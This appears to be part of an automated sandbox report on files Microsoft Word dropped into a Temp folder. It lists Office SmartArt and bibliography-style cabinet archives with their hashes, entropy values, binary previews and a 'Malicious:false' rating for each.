                                                                                                                                                        Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D52.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):21111
                                                                                                                                                        Entropy (8bit):7.6297992466897675
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                                                                                                                                        MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                                                                                                                                        SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                                                                                                                                        SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                                                                                                                                        SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D53.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):22149
                                                                                                                                                        Entropy (8bit):7.659898883631361
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                                                                                                                                        MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                                                                                                                                        SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                                                                                                                                        SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                                                                                                                                        SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D65.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):20457
                                                                                                                                                        Entropy (8bit):7.612540359660869
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                                                                                                                                        MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                                                                                                                                        SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                                                                                                                                        SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                                                                                                                                        SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D66.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):22008
                                                                                                                                                        Entropy (8bit):7.662386258803613
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                                                                                                                                        MD5:ABBF10CEE9480E41D81277E9538F98CB
                                                                                                                                                        SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                                                                                                                                        SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                                                                                                                                        SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D8A.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):21791
                                                                                                                                                        Entropy (8bit):7.65837691872985
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                                                                                                                                        MD5:7BF88B3CA20EB71ED453A3361908E010
                                                                                                                                                        SHA1:F75F86557051160507397F653D7768836E3B5655
                                                                                                                                                        SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                                                                                                                                        SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D8B.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):33610
                                                                                                                                                        Entropy (8bit):7.8340762758330476
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                                                                                                                                        MD5:51804E255C573176039F4D5B55C12AB2
                                                                                                                                                        SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                                                                                                                                        SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                                                                                                                                        SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D8C.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):26944
                                                                                                                                                        Entropy (8bit):7.7574645319832225
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                                                                                                                                        MD5:F913DD84915753042D856CEC4E5DABA5
                                                                                                                                                        SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                                                                                                                                        SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                                                                                                                                        SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D8D.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31008
                                                                                                                                                        Entropy (8bit):7.806058951525675
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                                                                                                                                        MD5:E033CCBC7BA787A2F824CE0952E57D44
                                                                                                                                                        SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                                                                                                                                        SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                                                                                                                                        SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D8E.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):20235
                                                                                                                                                        Entropy (8bit):7.61176626859621
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                                                                                                                                        MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                                                                                                                                        SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                                                                                                                                        SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                                                                                                                                        SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D8F.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):32833
                                                                                                                                                        Entropy (8bit):7.825460303519308
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                                                                                                                                        MD5:205AF51604EF96EF1E8E60212541F742
                                                                                                                                                        SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                                                                                                                                        SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                                                                                                                                        SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D90.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):28911
                                                                                                                                                        Entropy (8bit):7.7784119983764715
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                                                                                                                                        MD5:6D787B1E223DB6B91B69238062CCA872
                                                                                                                                                        SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                                                                                                                                        SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                                                                                                                                        SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D91.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31835
                                                                                                                                                        Entropy (8bit):7.81952379746457
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                                                                                                                                        MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                                                                                                                                        SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                                                                                                                                        SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                                                                                                                                        SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                                                                                                                                        Malicious:false
